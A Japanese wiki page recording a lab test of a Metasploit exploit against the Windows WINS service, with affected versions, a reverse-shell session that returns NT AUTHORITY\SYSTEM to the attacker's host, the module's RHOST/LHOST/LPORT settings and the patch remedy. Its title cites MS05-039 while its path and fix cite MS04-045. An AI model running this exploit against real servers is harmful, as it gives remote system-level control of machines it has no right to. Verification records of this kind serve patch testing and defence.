[[exploit:remote:windows:ms04-045]]
 
トレース: » syslog-ng 1.6.x インストール » Tripwire 初期設定 » php-syslog-ng (syslog管理用Webインターフェース) » MS05-002:カーソルおよびアイコンのフォーマットの処理の脆弱性により、リモートでコードが実行される » MS03-026:RPC インターフェイスのバッファ オーバーランによりコードが実行される » Cookie Stealer (PHP版) » Prelude-IDS センサーの追加 - Snort (侵入検知) » Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit » MS06-001:Graphics Rendering Engine の脆弱性によりコードが実行される可能性がある » MS05-039:WINS の脆弱性により、リモートでコードが実行される
目次

MS05-039:WINS の脆弱性により、リモートでコードが実行される

更新履歴

  • 2006/02/23 初版

概要

  • WINS サーバーの脆弱性に対するExploit
  • このExploitを使用すると、任意のコードを実行可能
  • 今回の検証では攻撃元IPアドレスにコネクトバックさせる

影響を受けるシステム

  • Microsoft Windows NT Server 4.0 Service Pack 6a
  • Microsoft Windows NT Server 4.0 Terminal Server Edition, Service Pack 6
  • Microsoft Windows 2000 Server Service Pack 3, Service Pack 4
  • Microsoft Windows ServerR 2003
  • Microsoft Windows Server 2003, 64-Bit Edition

影響を受けないシステム

  • Microsoft Windows 2000 Professional Service Pack 3 および Microsoft Windows 2000 Professional Service Pack 4
  • Microsoft Windows XP Service Pack 1 および Microsoft Windows XP Service Pack 2
  • Windows XP 64-Bit Edition Service Pack 1
  • Microsoft Windows XP 64-Bit Edition Version 2003
  • Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE)、および Microsoft Windows Millennium Edition (Me)

参考URL

Exploitの検証

検証環境

  • Windows2000 Advanced Server SP2 日本語版
  • Windows2000 Advanced Server SP4 日本語版

検証結果

  • 攻撃先IPアドレス: 192.168.1.250(PC名 unknown-wp4dxhv)
  • 攻撃元IPアドレス: 192.168.1.33(OS Windows XP SP1)
  • 攻撃元からExploitコードを実行
[*] Starting Reverse Handler.
[*] Attempting to overwrite 0x053df4c4 with 0x053922e0 (0x05391f40)
[*] Got connection from 192.168.1.33:4321 <-> 192.168.1.250:1035

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami
whoami
NT AUTHORITY\SYSTEM

C:\WINNT\system32>hostname
hostname
unknown-wp4dxhv

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter ローカル エリア接続:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.250
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1

C:\WINNT\system32>

対処方法

  1. MS04-045 パッチの適用 (Windows Update の実施)

備考

今回のExploitはMetasploitを使用しました。 この検証記録に使用した設定内容は以下の通りです。 

Exploit and Payload Options
===========================

  Exploit:    Name      Default          Description
  --------    ------    -------------    ------------------
  required    RHOST     192.168.1.250    The target address
  required    RPORT     42               The target port

  Payload:    Name        Default         Description
  --------    --------    ------------    ------------------------------------------
  required    EXITFUNC    process         Exit technique: "process", "thread", "seh"
  required    LHOST       192.168.1.33    Local address to receive connection
  required    LPORT       4321            Local port to receive connection

  Target: Windows 2000 English
 
exploit/remote/windows/ms04-045.txt · 最終更新: 2007/10/16 12:02
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki NINJA TOOLS